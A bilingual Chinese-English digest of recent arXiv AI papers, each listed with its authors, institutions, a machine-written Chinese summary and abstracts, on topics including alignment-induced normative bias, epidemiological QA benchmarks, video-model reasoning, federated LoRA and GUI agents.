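The forward value of $z$ is identical in both cases; only the identity term, which is the direct path from the high-level objective to the shallow layer, disappears from the backward pass.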

2603.17218 2026-05-27 cs.CL cs.AI cs.GT 版本更新

Alignment Makes Language Models Normative, Not Descriptive

对齐使语言模型变得规范,而非描述性

Eilam Shapira, Moshe Tennenholtz, Roi Reichart

发表机构 * Technion – Israel Institute of Technology(以色列理工学院)

AI总结 通过对比120个基础-对齐模型对在超过10,000个真实人类决策中的表现,发现对齐诱导了规范性偏差:在单轮教科书式博弈中提升预测,但在多轮战略博弈中因忽略互惠、报复等描述性动态而损害预测。

详情
AI中文摘要

后训练对齐优化语言模型以匹配人类偏好信号,但这一目标并不等同于对观察到的人类行为进行建模。我们在多轮战略博弈——讨价还价、说服、谈判和重复矩阵博弈中,比较了120个基础-对齐模型对在超过10,000个真实人类决策上的表现。在这些设置中,基础模型在预测人类选择方面以近10:1的比例优于其对齐版本,这一结果在模型家族、提示表述和博弈配置中均稳健成立。然而,在人类行为更可能遵循规范预测的设置中,这一模式发生了逆转:对齐模型在所有12种测试的单轮教科书式博弈以及非战略彩票选择中占据主导地位——甚至在多轮博弈本身中,在交互历史发展之前的第一轮也是如此。这种边界条件模式表明,对齐诱导了规范性偏差:当人类行为相对较好地由规范性解决方案捕捉时,它改善了预测;但在多轮战略设置中,当行为由互惠、报复和依赖于历史的适应等描述性动态塑造时,它损害了预测。这些结果揭示了在优化模型以供人类使用和将其用作人类行为代理之间的根本权衡。

英文摘要

Post-training alignment optimizes language models to match human preference signals, but this objective is not equivalent to modeling observed human behavior. We compare 120 base-aligned model pairs on more than 10,000 real human decisions in multi-round strategic games: bargaining, persuasion, negotiation, and repeated matrix games. In these settings, base models outperform their aligned counterparts in predicting human choices by nearly 10:1, robustly across model families, prompt formulations, and game configurations. This pattern reverses, however, in settings where human behavior is more likely to follow normative predictions: aligned models dominate on one-shot textbook games across all 12 types tested and on non-strategic lottery choices, and even within the multi-round games themselves, at round one, before interaction history develops. This boundary-condition pattern suggests that alignment induces a normative bias: it improves prediction when human behavior is relatively well captured by normative solutions, but hurts prediction in multi-round strategic settings, where behavior is shaped by descriptive dynamics such as reciprocity, retaliation, and history-dependent adaptation. These results reveal a fundamental trade-off between optimizing models for human use and using them as proxies for human behavior.

2601.03471 2026-05-27 cs.CL cs.AI 版本更新

EpiQAL: Benchmarking Large Language Models in Epidemiological Question Answering and Reasoning

EpiQAL:大型语言模型在流行病学问答与推理中的基准测试

Mingyang Wei, Dehai Min, Zewen Liu, Yuzhang Xie, Guanchen Wu, Ziyang Zhang, Carl Yang, Max S. Y. Lau, Qi He, Lu Cheng, Wei Jin

发表机构 * Emory University(埃默里大学) University of Illinois Chicago(伊利诺伊大学芝加哥分校) Microsoft(微软公司)

AI总结 提出EpiQAL基准,通过三个子集(事实回忆、多步推理、不完整信息下结论重建)评估LLM在流行病学推理中的表现,发现当前模型在多步推理上表现有限。

Comments 31 pages, 7 figures, 25 tables

详情
AI中文摘要

可靠的流行病学推理需要综合研究证据来推断疾病负担、传播动态和人群层面的干预效果。现有的医学问答基准主要强调临床知识或患者层面的推理,但很少有系统评估基于证据的流行病学推理。我们提出了EpiQAL,这是首个针对多种疾病的流行病学问答诊断基准,包含三个从开放获取文献构建的子集。这三个子集逐步测试事实回忆、多步推理以及在不完整信息下的结论重建,并通过结合分类学指导、多模型验证和难度筛选的质量控制流程构建。对涵盖开源和专有系统的15个模型的实验表明,当前LLM在流行病学推理上表现有限,其中多步推理构成最大挑战。模型排名在不同子集间发生变化,仅靠规模并不能预测成功。思维链提示有利于多步推理,但在其他情况下效果不一。EpiQAL为证据溯源、推断性推理和结论重建提供了细粒度的诊断信号。

英文摘要

Reliable epidemiological reasoning requires synthesizing study evidence to infer disease burden, transmission dynamics, and intervention effects at the population level. Existing medical question answering benchmarks primarily emphasize clinical knowledge or patient-level reasoning, yet few systematically evaluate evidence-grounded epidemiological inference. We present EpiQAL, the first diagnostic benchmark for epidemiological question answering across diverse diseases, comprising three subsets built from open-access literature. The three subsets progressively test factual recall, multi-step inference, and conclusion reconstruction under incomplete information, and are constructed through a quality-controlled pipeline combining taxonomy guidance, multi-model verification, and difficulty screening. Experiments on fifteen models spanning open-source and proprietary systems reveal that current LLMs show limited performance on epidemiological reasoning, with multi-step inference posing the greatest challenge. Model rankings shift across subsets, and scale alone does not predict success. Chain-of-Thought prompting benefits multi-step inference but yields mixed results elsewhere. EpiQAL provides fine-grained diagnostic signals for evidence-grounding, inferential reasoning, and conclusion reconstruction.

2603.16870 2026-05-27 cs.CV cs.AI 版本更新

Demystifying Video Reasoning

揭秘视频推理

Ruisi Wang, Zhongang Cai, Fanyi Pu, Junxiang Xu, Wanqi Yin, Maijunxian Wang, Ran Ji, Chenyang Gu, Bo Li, Ziqi Huang, Hokin Deng, Dahua Lin, Ziwei Liu, Lei Yang

发表机构 * SenseTime Research(商汤科技研究院) Nanyang Technological University(南洋理工大学) University of California, Berkeley(加州大学伯克利分校) University of California, San Diego(加州大学圣地亚哥分校) Carnegie Mellon University(卡内基梅隆大学)

AI总结 本文通过实验揭示视频扩散模型中的推理主要发生在去噪步骤中,提出链式步骤(CoS)机制,并发现工作记忆、自我修正和感知先行等涌现行为,最后提出一种无需训练的集成策略来提升推理能力。

Comments Homepage: https://www.wruisi.com/demystifying_video_reasoning

详情
AI中文摘要

近期视频生成的进展揭示了一个意外现象:基于扩散的视频模型展现出非平凡的推理能力。先前的工作将此归因于链式帧(CoF)机制,假设推理在视频帧间顺序展开。在本工作中,我们挑战这一假设,并揭示了一个根本不同的机制。我们表明视频模型中的推理主要沿着扩散去噪步骤涌现。通过定性分析和针对性探测实验,我们发现模型在早期去噪步骤中探索多个候选解,并逐步收敛到最终答案,我们将此过程称为链式步骤(CoS)。除了这一核心机制,我们还识别出对模型性能至关重要的几种涌现推理行为:(1)工作记忆,支持持久参考;(2)自我修正与增强,允许从不正确的中间解中恢复;(3)先感知后行动,早期步骤建立语义基础,后期步骤执行结构化操作。在扩散步骤内部,我们进一步揭示了扩散变换器中的自演化功能特化:早期层编码密集的感知结构,中间层执行推理,后期层巩固潜在表示。受这些见解的启发,我们提出了一种简单的无需训练的策略作为概念验证,展示了如何通过集成来自相同模型不同随机种子的潜在轨迹来改进推理。总体而言,我们的工作系统性地理解了推理如何在视频生成模型中涌现,为未来研究更好地利用视频模型固有的推理动态作为智能的新基础提供了基础。

英文摘要

Recent advances in video generation have revealed an unexpected phenomenon: diffusion-based video models exhibit non-trivial reasoning capabilities. Prior work attributes this to a Chain-of-Frames (CoF) mechanism, where reasoning is assumed to unfold sequentially across video frames. In this work, we challenge this assumption and uncover a fundamentally different mechanism. We show that reasoning in video models instead primarily emerges along the diffusion denoising steps. Through qualitative analysis and targeted probing experiments, we find that models explore multiple candidate solutions in early denoising steps and progressively converge to a final answer, a process we term Chain-of-Steps (CoS). Beyond this core mechanism, we identify several emergent reasoning behaviors critical to model performance: (1) working memory, enabling persistent reference; (2) self-correction and enhancement, allowing recovery from incorrect intermediate solutions; and (3) perception before action, where early steps establish semantic grounding and later steps perform structured manipulation. During a diffusion step, we further uncover self-evolved functional specialization within Diffusion Transformers, where early layers encode dense perceptual structure, middle layers execute reasoning, and later layers consolidate latent representations. Motivated by these insights, we present a simple training-free strategy as a proof-of-concept, demonstrating how reasoning can be improved by ensembling latent trajectories from identical models with different random seeds. Overall, our work provides a systematic understanding of how reasoning emerges in video generation models, offering a foundation to guide future research in better exploiting the inherent reasoning dynamics of video models as a new substrate for intelligence.

2603.16654 2026-05-27 cs.CL cs.AI cs.LG 版本更新

Omanic: Towards Step-wise Evaluation of Multi-hop Reasoning in Large Language Models

Omanic:迈向大语言模型多跳推理的逐步评估

Xiaojie Gu, Sherry T. Tong, Aosong Feng, Sophia Simeng Han, Jinghui Lu, Yingjian Chen, Yusuke Iwasawa, Yutaka Matsuo, Chanjun Park, Rex Ying, Irene Li

发表机构 * The University of Tokyo(东京大学) Yale University(耶鲁大学) Stanford University(斯坦福大学) Xiaomi EV(小米汽车) Soongsil University(崇实大学)

AI总结 针对大语言模型在多跳问答中中间步骤推理失败难以诊断的问题,提出Omanic基准,通过分解为单跳子问题并分析步骤级错误,揭示后期跳数瓶颈、事实知识下限和错误传播,微调后提升多个推理基准性能。

详情
AI中文摘要

仅从最终答案评估大语言模型(LLM)的推理能力可能会掩盖中间步骤的失败,尤其是在没有步骤级标注的多跳问答基准中。为解决这一问题,我们引入了Omanic,一个开放域4跳问答基准,它不仅用于衡量最终答案的准确性,还用于诊断推理在何处中断。Omanic包含10,296个机器生成的训练示例(OmanicSynth)和967个经专家审核的人工标注评估示例(OmanicBench),每个评估问题被分解为单跳子问题、中间答案和结构化图拓扑。对专有和开源LLM的实验表明,Omanic具有挑战性,而逐步分析揭示了后期跳数瓶颈、事实知识下限以及沿推理链的错误传播。在OmanicSynth上微调可迁移到六个推理和数学基准,平均提升7.41分,验证了其作为推理能力迁移监督的有效性。我们在https://huggingface.co/datasets/li-lab/Omanic 发布数据,在https://github.com/XiaojieGu/Omanic 发布代码。

英文摘要

Evaluating the reasoning abilities of large language models (LLMs) solely from final answers can obscure failures in intermediate steps, especially in multi-hop QA benchmarks without step-level annotations. To address this gap, we introduce Omanic, an open-domain 4-hop QA benchmark designed not only to measure final-answer accuracy but also to diagnose where reasoning breaks down. Omanic contains 10,296 machine-generated training examples (OmanicSynth) and 967 expert-reviewed human-annotated evaluation examples (OmanicBench), with each evaluation question decomposed into single-hop sub-questions, intermediate answers, and structured graph topologies. Experiments with proprietary and open-source LLMs show that Omanic is challenging, while step-wise analysis reveals a later-hop bottleneck, factual knowledge floor, and error propagation along reasoning chains. Fine-tuning on OmanicSynth transfers to six reasoning and mathematics benchmarks, yielding a 7.41-point average gain and validating its effectiveness as supervision for reasoning-capability transfer. We release the data at https://huggingface.co/datasets/li-lab/Omanic and the code at https://github.com/XiaojieGu/Omanic.
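
Step-wise diagnosis of a multi-hop chain can be sketched as locating the first hop whose intermediate answer disagrees with the annotation. This is an illustrative sketch, not the Omanic evaluation code: the function names are hypothetical, and case- and whitespace-insensitive exact match is our assumption about how answers are compared.

```python
from collections import Counter
from typing import List, Optional, Tuple


def normalise(answer: str) -> str:
    """Assumed matching rule: lower-case and collapse whitespace."""
    return " ".join(answer.lower().split())


def first_broken_hop(predicted: List[str], gold: List[str]) -> Optional[int]:
    """Return the 1-based index of the first wrong intermediate answer, or None."""
    for hop, (p, g) in enumerate(zip(predicted, gold), start=1):
        if normalise(p) != normalise(g):
            return hop
    return None


def hop_error_profile(examples: List[Tuple[List[str], List[str]]]) -> Counter:
    """Count, over a dataset, where each reasoning chain first breaks."""
    return Counter(first_broken_hop(p, g) for p, g in examples)
```

A profile concentrated on hops 3 and 4 would correspond to the later-hop bottleneck the abstract reports, while a final-answer-only metric would not distinguish it from an early failure.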

2603.13853 2026-05-27 cs.CL cs.AI 版本更新

APEX-Searcher: Refining Credit Assignment with Subgoaling for Agentic Retrieval-Augmented Generation

APEX-Searcher: 通过子目标细化信用分配以增强智能体检索增强生成

Kun Chen, Qingchao Kong, Zhao Feifei, Wenji Mao

发表机构 * University of Chinese Academy of Sciences(中国科学院大学) MAIS, Institute of Automation, Chinese Academy of Sciences(中国科学院自动化研究所MAIS部) Wenge Technology Co., Ltd(Wenger科技有限公司)

AI总结 针对复杂多跳问答中检索路径模糊和端到端强化学习奖励稀疏的问题,提出APEX-Searcher,通过分离规划与执行的信用分配(规划用RL优化、执行用SFT学习),在多个基准上取得一致提升。

详情
AI中文摘要

检索增强生成(RAG)将大型语言模型(LLMs)与外部知识连接起来,但单轮检索通常不足以应对复杂的多跳问题。为了增强复杂任务的搜索能力,大多数现有工作通过端到端训练将多轮迭代检索与推理过程相结合。虽然这些方法提高了问题解决性能,但它们仍然面临任务推理和模型训练方面的挑战,尤其是模糊的检索执行路径和端到端强化学习(RL)中的稀疏奖励,这可能导致不准确的检索结果和较低的性能。我们将这些失败归因于层次化的信用纠缠:单一的最终奖励同时更新规划和执行,因此模型无法清晰地区分规划错误和检索错误。我们提出APEX-Searcher,它采用了一种细化信用分配的范式:规划通过带有规划级奖励的RL进行优化,而执行则通过SFT学习。大量实验表明,在多跳RAG和任务规划基准上均取得了一致的提升。

英文摘要

Retrieval-augmented generation (RAG) connects large language models (LLMs) to external knowledge, but single-round retrieval is often insufficient for complex multi-hop questions. To enhance search capabilities for complex tasks, most existing works integrate multi-round iterative retrieval with reasoning processes via end-to-end training. While these approaches improve problem-solving performance, they still face challenges in task reasoning and model training, especially ambiguous retrieval execution paths and sparse rewards in end-to-end reinforcement learning (RL), which can lead to inaccurate retrieval results and lower performance. We attribute these failures to hierarchical credit entanglement: a single final reward updates planning and execution together, so the model cannot clearly separate plan errors from retrieval errors. We propose APEX-Searcher, which uses a Refining Credit Assignment paradigm: planning is optimized by RL with a plan-level reward, while execution is learned by SFT. Extensive experiments show consistent gains in both multi-hop RAG and task planning across benchmarks.

2603.15500 2026-05-27 cs.AI cs.LG 版本更新

Understanding Reasoning in LLMs through Strategic Information Allocation under Uncertainty

不确定性下通过策略信息分配理解LLM中的推理

Jeonghye Kim, Xufang Luo, Minbeom Kim, Sangmook Lee, Dongsheng Li, Yuqing Yang

发表机构 * Microsoft Research(微软研究院) KAIST(韩国科学技术院) Seoul National University(首尔国立大学)

AI总结 本文提出一个信息论框架,将推理分解为程序推进和认知外化(不确定性标记级外化),证明零散外化能在无显式错误触发时恢复收敛,并通过实验表明小规模SFT即可调控该能力,从而将推理重新定义为不确定性下的策略信息分配。

详情
AI中文摘要

LLM 经常表现出“啊哈”时刻,例如在“Wait”等标记后进行自我修正,但其潜在机制仍不清楚。标准 LLM 主要通过无声发散崩溃,即轨迹偏离正确答案但仍保持局部连贯,因此没有显式错误触发反应性自我修正。我们引入一个信息论框架,将推理分解为程序推进和认知外化(不确定性的标记级外化),并证明零散外化能在没有显式错误触发的情况下恢复向正确答案的收敛。实验上,一个最小的怀疑线索即可恢复失败的轨迹,小规模 SFT 足以灌输或抑制这种能力,这表明强推理更少依赖于非凡的内在机制,而更多依赖于外化不确定性的语言习惯。我们的框架将推理重新定义为不确定性下的策略信息分配,为理解和推进 LLM 推理提供了新视角。

英文摘要

LLMs often exhibit Aha moments such as self-correction after tokens like "Wait," yet the underlying mechanism remains unclear. Standard LLMs collapse mainly through silent divergence, where trajectories drift from the correct answer yet remain locally coherent, so no explicit error triggers reactive self-correction. We introduce an information-theoretic framework that separates reasoning into procedural advancement and epistemic verbalization, the token-level externalization of uncertainty, and prove that sporadic verbalization restores convergence toward the correct answer even without explicit error triggers. Empirically, a minimal doubt cue recovers failed trajectories, and small-scale SFT suffices to instill or suppress this capability, suggesting that strong reasoning hinges less on an extraordinary inner mechanism than on the linguistic habit of externalizing uncertainty. Our framework recasts reasoning as strategic information allocation under uncertainty, offering a new lens for understanding and advancing LLM reasoning.

2603.13282 2026-05-27 cs.LG cs.AI 版本更新

FedTreeLoRA: Reconciling Statistical and Functional Heterogeneity in Federated LoRA Fine-Tuning

FedTreeLoRA:协调联邦LoRA微调中的统计异质性与功能异质性

Jieming Bian, Lei Wang, Letian Zhang, Jie Xu

发表机构 * University of Florida, Gainesville, FL 32611(佛罗里达大学) Middle Tennessee State University Murfreesboro, TN 37132(中田纳西州立大学)

AI总结 针对联邦LoRA微调中统计异质性与功能异质性正交耦合的问题,提出树结构聚合框架FedTreeLoRA,通过逐层对齐实现泛化与个性化的有效平衡。

Comments Accepted by ICML 2026

详情
AI中文摘要

基于低秩自适应(LoRA)的联邦学习(FL)已成为隐私保护的大语言模型微调的标准方法。然而,现有的个性化方法主要在一种限制性的平面模型假设下运行:它们处理客户端的\textit{统计异质性},但将模型视为一个整体块,忽略了跨LLM层的\textit{功能异质性}。我们认为这两个维度——统计(水平)异质性和功能(垂直)异质性——在来源上是正交的,但在交互中是耦合的,这意味着参数共享的最优深度在功能上依赖于客户端的相似性。为了解决这个问题,我们提出了\textbf{FedTreeLoRA},一个采用树结构聚合进行细粒度逐层对齐的框架。通过动态构建聚合层次结构,FedTreeLoRA允许客户端在浅层“树干”上共享广泛共识,同时在深层“树枝”上逐步特化。在NLU和NLG基准上的实验表明,FedTreeLoRA通过有效协调泛化与个性化,显著优于现有最先进方法。

英文摘要

Federated Learning (FL) with Low-Rank Adaptation (LoRA) has become a standard for privacy-preserving LLM fine-tuning. However, existing personalized methods predominantly operate under a restrictive Flat-Model Assumption: they address client-side \textit{statistical heterogeneity} but treat the model as a monolithic block, ignoring the \textit{functional heterogeneity} across LLM layers. We argue that these two dimensions, statistical (horizontal) and functional (vertical), are \textit{orthogonal in source yet coupled in interaction}, implying that the optimal depth of parameter sharing is functionally dependent on client similarity. To address this, we propose \textbf{FedTreeLoRA}, a framework employing tree-structured aggregation for fine-grained, layer-wise alignment. By dynamically constructing an aggregation hierarchy, FedTreeLoRA allows clients to share broad consensus on shallow `trunks' while progressively specializing on deep `branches'. Experiments on NLU and NLG benchmarks demonstrate that FedTreeLoRA significantly outperforms state-of-the-art methods by effectively reconciling generalization and personalization.
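
The trunk-and-branch picture can be illustrated with a fixed two-level tree. This is a simplified sketch under our own assumptions, not the FedTreeLoRA algorithm: the abstract says the hierarchy is built dynamically, whereas here the client clusters and the `split_layer` boundary are given by hand, each layer's LoRA update is flattened to a plain list of floats, and the function names are hypothetical.

```python
from typing import Dict, List

Vector = List[float]


def mean(vectors: List[Vector]) -> Vector:
    """Element-wise average of equally sized vectors."""
    n = len(vectors)
    return [sum(v[i] for v in vectors) / n for i in range(len(vectors[0]))]


def tree_aggregate(
    updates: Dict[str, List[Vector]],  # client id -> per-layer update vectors
    clusters: List[List[str]],         # hand-specified groups of similar clients
    split_layer: int,                  # layers below this index form the shared trunk
) -> Dict[str, List[Vector]]:
    num_layers = len(next(iter(updates.values())))
    # Trunk: shallow layers are averaged over every client.
    trunk = [mean([updates[c][l] for c in updates]) for l in range(split_layer)]
    result = {}
    for group in clusters:
        # Branch: deeper layers are averaged only within the client's cluster.
        branch = [mean([updates[c][l] for c in group]) for l in range(split_layer, num_layers)]
        for client in group:
            result[client] = trunk + branch
    return result
```

Setting `split_layer` to the number of layers recovers plain global averaging, and setting it to zero gives purely cluster-wise models, so the split depth is the knob that trades generalization against personalization.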

2603.08413 2026-05-27 cs.LG cs.AI 版本更新

Geometrically Constrained Outlier Synthesis

几何约束异常合成

Daniil Karzanov, Marcin Detyniecki

发表机构 * AXA AI Research(AXA人工智能研究) EPFL, Lausanne, Switzerland(瑞士洛桑联邦理工学院) Polish Academy of Science, IBS PAN, Warsaw, Poland(波兰科学院,IBS PAN,华沙,波兰)

AI总结 提出几何约束异常合成(GCOS)方法,通过在隐藏特征空间中生成受几何约束的虚拟异常样本,结合对比正则化,提升图像分类模型对分布外样本的鲁棒性。

Comments 19 pages, accepted to ICML 2026

详情
AI中文摘要

用于图像分类的深度神经网络通常对分布外(OOD)样本表现出过度自信。为了解决这个问题,我们引入了几何约束异常合成(GCOS),这是一种训练时正则化框架,旨在提高推理时的OOD鲁棒性。GCOS通过生成隐藏特征空间中尊重分布内(ID)数据学习到的流形结构的虚拟异常,解决了先前合成方法的局限性。合成分两个阶段进行:(i)从训练特征中提取的主方差子空间识别出几何信息引导的离流形方向;(ii)由校准集中非一致性得分的经验分位数定义的一个类共形壳,自适应地控制合成幅度以产生边界样本。该壳确保生成的异常既不是微不足道可检测的,也不是与分布内数据无法区分的,从而促进更平滑地学习鲁棒特征。这与对比正则化目标相结合,在选定的得分空间(如马氏距离或基于能量的)中促进ID和OOD样本的可分离性。实验表明,在近OOD基准测试(定义为异常与分布内数据共享相同语义域的任务)上,使用标准基于能量的推理时,GCOS优于最先进的方法。作为探索性扩展,该框架自然地过渡到共形OOD推理,将不确定性得分转化为统计上有效的p值,并启用具有形式误差保证的阈值,为更可预测和可靠的OOD检测提供了途径。

英文摘要

Deep neural networks for image classification often exhibit overconfidence on out-of-distribution (OOD) samples. To address this, we introduce Geometrically Constrained Outlier Synthesis (GCOS), a training-time regularization framework aimed at improving OOD robustness during inference. GCOS addresses a limitation of prior synthesis methods by generating virtual outliers in the hidden feature space that respect the learned manifold structure of in-distribution (ID) data. The synthesis proceeds in two stages: (i) a dominant-variance subspace extracted from the training features identifies geometrically informed, off-manifold directions; (ii) a conformally-inspired shell, defined by the empirical quantiles of a nonconformity score from a calibration set, adaptively controls the synthesis magnitude to produce boundary samples. The shell ensures that generated outliers are neither trivially detectable nor indistinguishable from in-distribution data, facilitating smoother learning of robust features. This is combined with a contrastive regularization objective that promotes separability of ID and OOD samples in a chosen score space, such as Mahalanobis or energy-based. Experiments demonstrate that GCOS outperforms state-of-the-art methods using standard energy-based inference on near-OOD benchmarks, defined as tasks where outliers share the same semantic domain as in-distribution data. As an exploratory extension, the framework naturally transitions to conformal OOD inference, which translates uncertainty scores into statistically valid p-values and enables thresholds with formal error guarantees, providing a pathway toward more predictable and reliable OOD detection.
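
The conformal extension mentioned at the end of the abstract turns a score into a p-value. A minimal sketch of the standard split-conformal p-value is given below, assuming that a higher nonconformity score means "more unusual" and that the calibration scores come from held-out in-distribution samples. The function name and the toy scores are illustrative, not taken from the paper.

```python
def conformal_p_value(calibration_scores, test_score):
    """Share of calibration scores at least as large as the test score,
    with the usual +1 correction in numerator and denominator."""
    n = len(calibration_scores)
    at_least = sum(1 for s in calibration_scores if s >= test_score)
    return (at_least + 1) / (n + 1)


# Toy calibration scores from in-distribution data (made up for illustration).
calibration = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]

p_typical = conformal_p_value(calibration, 0.35)  # 6 scores are >= 0.35
p_outlier = conformal_p_value(calibration, 1.5)   # no score is >= 1.5

alpha = 0.1                      # target false-alarm rate on in-distribution data
flag_as_ood = p_outlier <= alpha
```

Thresholding the p-value at `alpha` bounds the rate at which exchangeable in-distribution samples are flagged, which is the kind of formal error guarantee the abstract refers to.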

2603.03585 2026-05-27 cs.CL cs.AI 版本更新

Belief-Sim: Towards Belief-Driven Simulation of Demographic Misinformation Susceptibility

Belief-Sim:迈向信念驱动的人口统计错误信息易感性模拟

Angana Borah, Zohaib Khan, Rada Mihalcea, Verónica Pérez-Rosas

发表机构 * University of Michigan - Ann Arbor(密歇根大学安娜堡分校) Texas State University(德克萨斯州立大学)

AI总结 提出BeliefSim框架,利用心理学分类和调查先验构建人口信念档案,通过提示条件化和后训练适应,实现基于信念模拟人口统计错误信息易感性,对齐度达92%。

Comments Paper Under Review

详情
AI中文摘要

错误信息是一种日益严重的社会威胁,由于潜在信念的差异,不同人口群体对错误信息的易感性各不相同。随着大型语言模型(LLM)越来越多地被用于模拟人类行为,我们研究它们是否能够模拟人口统计错误信息易感性,将信念视为主要驱动因素。我们引入BeliefSim,一个模拟框架,利用心理学信息错误信息分类法和调查先验构建人口信念档案。我们研究了基于提示的条件化和后训练适应,并使用以下方法进行了多方面的评估:(i)易感性对齐和(ii)反事实人口敏感性。在两个数据集和建模策略中,我们表明信念为模拟错误信息易感性提供了强大的先验,对齐度高达92%。

英文摘要

Misinformation is a growing societal threat, and susceptibility to misinformative claims varies across demographic groups due to differences in underlying beliefs. As Large Language Models (LLMs) are increasingly used to simulate human behaviors, we investigate whether they can simulate demographic misinformation susceptibility, treating beliefs as a primary driving factor. We introduce BeliefSim, a simulation framework that constructs demographic belief profiles using psychology-informed misinformation taxonomies and survey priors. We study prompt-based conditioning and post-training adaptation, and conduct a multi-fold evaluation using: (i) susceptibility alignment and (ii) counterfactual demographic sensitivity. Across both datasets and modeling strategies, we show that beliefs provide a strong prior for simulating misinformation susceptibility, with alignment up to 92%.

2603.01800 2026-05-27 cs.LG cs.AI stat.ML stat.OT 版本更新

Phase-Type Variational Autoencoders for Heavy-Tailed Data

Phase-Type变分自编码器用于重尾数据

Abdelhakim Ziani, András Horváth, Paolo Ballarini

发表机构 * Université Paris Saclay, Lab. MICS, CentraleSupélec, Gif-sur-Yvette, France(巴黎萨克雷大学,MICS实验室,CentraleSupélec,法国伊薇特河畔吉夫)

AI总结 提出Phase-Type变分自编码器(PH-VAE),通过将解码器分布建模为潜在条件相位型分布(连续时间马尔可夫链的吸收时间),灵活适应重尾行为,在合成和真实基准上优于高斯、Student-t和极值VAE解码器。

详情
AI中文摘要

重尾分布在现实世界数据中无处不在,其中罕见但极端的事件主导了风险和变异性。然而,标准变分自编码器(VAE)采用简单的解码器分布,如高斯分布,无法捕捉重尾行为,而现有的重尾感知扩展仍然局限于预定义的参数族,其尾部行为是预先固定的。我们提出了Phase-Type变分自编码器(PH-VAE),其解码器分布是一个潜在条件的Phase-Type(PH)分布,定义为连续时间马尔可夫链(CTMC)的吸收时间。这种公式组合了多个指数时间尺度,产生了一个灵活且解析可处理的解码器,它直接从观测数据中调整其有限范围的尾部行为。在合成和真实世界基准上的实验表明,PH-VAE能够准确逼近各种重尾分布,在建模观测到的尾部行为和极端分位数方面显著优于基于高斯、Student-t和极值的VAE解码器。在多变量设置中,PH-VAE通过其共享的潜在表示捕捉了现实中的跨维度尾部依赖性。据我们所知,这是首次将Phase-Type分布整合到深度生成建模中的工作,桥接了应用概率论和表示学习。

英文摘要

Heavy-tailed distributions are ubiquitous in real-world data, where rare but extreme events dominate risk and variability. However, standard Variational Autoencoders (VAEs) employ simple decoder distributions, such as Gaussian distributions, that fail to capture heavy-tailed behavior, while existing heavy-tail-aware extensions remain restricted to predefined parametric families whose tail behavior is fixed a priori. We propose the Phase-Type Variational Autoencoder (PH-VAE), whose decoder distribution is a latent-conditioned Phase-Type (PH) distribution, defined as the absorption time of a continuous-time Markov chain (CTMC). This formulation composes multiple exponential time scales, yielding a flexible and analytically tractable decoder that adapts its finite-range tail behavior directly from the observed data. Experiments on synthetic and real-world benchmarks demonstrate that PH-VAE accurately approximates diverse heavy-tailed distributions, significantly outperforming Gaussian, Student-t, and extreme-value-based VAE decoders in modeling observed tail behavior and extreme quantiles. In multivariate settings, PH-VAE captures realistic cross-dimensional tail dependence through its shared latent representation. To our knowledge, this is the first work to integrate Phase-Type distributions into deep generative modeling, bridging applied probability and representation learning.
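
To make "absorption time of a continuous-time Markov chain" concrete, the sketch below samples from a Phase-Type distribution by simulating the chain until it is absorbed. It is a plain simulation, not the PH-VAE decoder: the initial probabilities `alpha` and sub-generator `S` are fixed toy values here, whereas the paper conditions them on a latent variable. All names are illustrative.

```python
import random


def sample_absorption_time(initial_probs, sub_generator, rng):
    """Sample the absorption time of a CTMC with transient states 0..k-1.

    sub_generator[i][j] (i != j) is the jump rate i -> j, the diagonal holds
    minus the total exit rate, and the missing row mass is the absorption rate.
    """
    k = len(initial_probs)
    state = rng.choices(range(k), weights=initial_probs)[0]
    elapsed = 0.0
    while True:
        exit_rate = -sub_generator[state][state]
        elapsed += rng.expovariate(exit_rate)  # exponential holding time
        to_transient = [
            sub_generator[state][j] if j != state else 0.0 for j in range(k)
        ]
        to_absorb = max(0.0, exit_rate - sum(to_transient))
        nxt = rng.choices(range(k + 1), weights=to_transient + [to_absorb])[0]
        if nxt == k:  # index k stands for the absorbing state
            return elapsed
        state = nxt


# Toy example: a two-phase hyperexponential (fast phase rate 1, slow phase rate 0.05).
alpha = [0.9, 0.1]
S = [[-1.0, 0.0], [0.0, -0.05]]

rng = random.Random(0)
samples = [sample_absorption_time(alpha, S, rng) for _ in range(20000)]
empirical_mean = sum(samples) / len(samples)
analytic_mean = 0.9 * (1 / 1.0) + 0.1 * (1 / 0.05)  # mixture mean = 2.9
```

Mixing a fast and a slow exponential phase already produces a much longer tail than a single exponential, which is the "multiple exponential time scales" effect the abstract describes.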

2602.22190 2026-05-27 cs.LG cs.AI cs.CL 版本更新

GUI-Libra: Training Native GUI Agents to Reason and Act with Action-aware Supervision and Partially Verifiable RL

GUI-Libra:训练原生GUI代理进行推理与行动——基于动作感知监督和部分可验证强化学习

Rui Yang, Qianhui Wu, Zhaoyang Wang, Hanyang Chen, Ke Yang, Hao Cheng, Huaxiu Yao, Baolin Peng, Huan Zhang, Jianfeng Gao, Tong Zhang

发表机构 * UIUC(伊利诺伊大学香槟分校) Microsoft(微软) UNC-Chapel Hill(北卡罗来纳大学教堂山分校)

AI总结 提出GUI-Libra训练方案,通过动作感知SFT和部分可验证RL中的KL正则化,解决GUI代理在长程导航任务中推理与定位冲突及部分可验证性问题,显著提升步骤准确率和任务完成率。

Comments 57 pages, 17 figures

详情
AI中文摘要

开源原生GUI代理在长程导航任务上仍落后于闭源系统。这一差距源于两个限制:缺乏高质量、动作对齐的推理数据,以及直接采用忽视GUI代理独特挑战的通用后训练流程。我们识别出这些流程中的两个基本问题:(i) 带有CoT推理的标准SFT常损害定位能力,(ii) 逐步RLVR式训练面临部分可验证性,即多个动作可能正确但仅有一个示范动作用于验证。这使得离线逐步指标成为在线任务成功的弱预测器。在本工作中,我们提出GUI-Libra,一种定制化训练方案以应对这些挑战。首先,为缓解动作对齐推理数据的稀缺性,我们引入数据构建和过滤流程,并发布精心整理的81K GUI推理数据集。其次,为调和推理与定位,我们提出动作感知SFT,混合推理后动作和直接动作数据,并重新加权token以强调动作和定位。第三,为在部分可验证性下稳定RL,我们识别出RLVR中KL正则化被忽视的重要性,并证明KL信任域对改善离线到在线可预测性至关重要;我们进一步引入成功自适应缩放以降低不可靠负梯度的权重。在多种Web和移动基准测试中,GUI-Libra一致地提升了步骤准确率和端到端任务完成率。我们的结果表明,精心设计的后训练和数据整理可以在无需昂贵在线数据收集的情况下,释放显著更强的任务解决能力。我们发布数据集、代码和模型,以促进对具备推理能力的GUI代理的数据高效后训练的进一步研究。

英文摘要

